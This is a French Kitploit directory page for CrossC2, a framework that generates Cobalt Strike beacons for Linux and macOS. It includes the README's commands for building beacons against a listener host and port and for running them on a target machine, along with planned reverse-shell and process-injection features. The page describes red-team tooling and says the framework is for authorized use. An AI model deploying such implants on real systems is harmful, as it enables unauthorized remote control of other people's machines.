Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CrossC2 — Générer le payload multiplateforme de CobaltStrike | Kitploit
Outils/GitHubGitHub/gloxec/crossc2
Frameworks de Tests d'IntrusionFrameworks d'ExploitationGénération de PayloadsPost-ExploitationCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubgloxec/crossc2

CrossC2

Générer le payload multiplateforme de CobaltStrike

Voir le dépôt
2.6k374il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Framework CrossC2

Linux macOS GitHub issues-closed Release Downloads

CrossC2 Logo

README | 中文文档 | README_FULL | 中文完整文档

Compatibilité CobaltStrike

Prend en charge l'évaluation de sécurité de CobaltStrike sur d'autres plateformes (Linux/MacOS/...), et inclut le support de développement du module de post-exploitation Unix.

2023-07-31 16.56.51

Utilisation

  1. Téléchargement

Téléchargez CrossC2.cna genCrossC2 CrossC2Kit, puis modifiez la configuration de CrossC2.cna

  1. Créer un listener et copier la clé
  • Créez un listener windows/beacon_https/reverse_https
  • Copiez .cobaltstrike.beacon_keys dans le répertoire du serveur d'équipe vers le répertoire local
  1. Extension de fonctions
  • Ajoutez CrossC2Kit_Loader.cna, incluant le chargement en mémoire et d'autres fonctions
  • La fonction de gestion des fichiers et de liste des processus de la version cs4.x est manquante, vous devez utiliser ce Loader et redémarrer
  1. Générer un beacon

Par défaut, utilisez la fonction GUI fournie par cli ou cna pour générer le beacon

genCrossC2 <ip-domaine-listener> <port-listener> <beacon_keys> <bibliothèque_rebind;config.ini;c2profile.profile> <plateforme_cible> <architecture_cible>

exemple :

root@kitploit:~
1. lire BEACON_KEY depuis le chemin actuel et générer un BEACON avec le protocole de trafic C2Profile par défaut
    genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
     
2. spécifier le BEACON d'une bibliothèque dynamique de protocole personnalisé
    genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out

3. spécifier le C2Profile à analyser automatiquement
    genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out

Une configuration plus avancée se trouve dans la documentation : 📄Référence

  1. Exécuter le beacon
  • Exécutez le script en ligne one-click généré par le plugin CrossC2 sur la cible
  • Après avoir téléchargé le beacon sur la machine cible pour une opération autorisée
  • Définissez le répertoire de travail du beacon et exécutez : export CCPATH=/opt/ && /tmp/c2
  • Spécifiez temporairement la bibliothèque de protocole pour le beacon et exécutez : /tmp/c2 /tmp/c2-rebind.so
  • Définissez temporairement la configuration C2 pour le beacon : export CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2
  • Activez DEBUG pour voir l'état en ligne du beacon : export CCDEBUG=1 && /tmp/c2

CrossC2Kit

CrossC2Kit : https://github.com/CrossC2/CrossC2Kit

CrossC2Kit est une extension d'infiltration autour de la plateforme Unix dérivée de CrossC2. Utilise le moteur de script open source Aggressor Script. Il peut être utilisé pour créer de l'automatisation afin de simuler le processus opérationnel de la Red Team et d'étendre le client CobaltStrike.

CrossC2Kit est hérité des fonctionnalités originales de CobaltStrike, donc la grammaire de développement et d'écriture se réfère toujours à la documentation officielle : https://trial.cobaltstrike.com/aggressor-script/index.html

Mais il possède des extensions d'API supplémentaires sur CrossC2 pour contrôler le beacon de la plateforme Unix

API : 📄Référence

Démo : CrossC2_action2

Note

Réservé à un usage interne par les entreprises et les organisations, ce framework présente un certain degré d'instabilité. Les non-professionnels ne sont pas autorisés à l'utiliser. Personne ne doit l'utiliser à des fins illégales ou lucratives. De plus, la publication d'une version modifiée non autorisée est également interdite, sous peine de responsabilités légales.

À faire

  1. Support de la connexion via proxy http (authentifié) et proxy socks
  2. Node beacon ? (Type de nœud unique, pouvant héberger d'autres beacons sans dépendre du teamserver)
  3. Support du reverse shell côté Linux & MacOS via so/dylib, et ses fonctions dérivées d'injection de processus

Remerciements

Merci à @Emma pour le logo conçu pour CrossC2, qui s'inspire du style des séries Armitage et CobaltStrike.

Télécharger l’outil
CS3.14 (corrections de bogues)CS4.0CS4.X (4.1~4.8)
Branche principale✅
Branche cs4.0✅
Branche cs4.1✅
Page de version <= v2.1✅
Page de version >= v2.2✅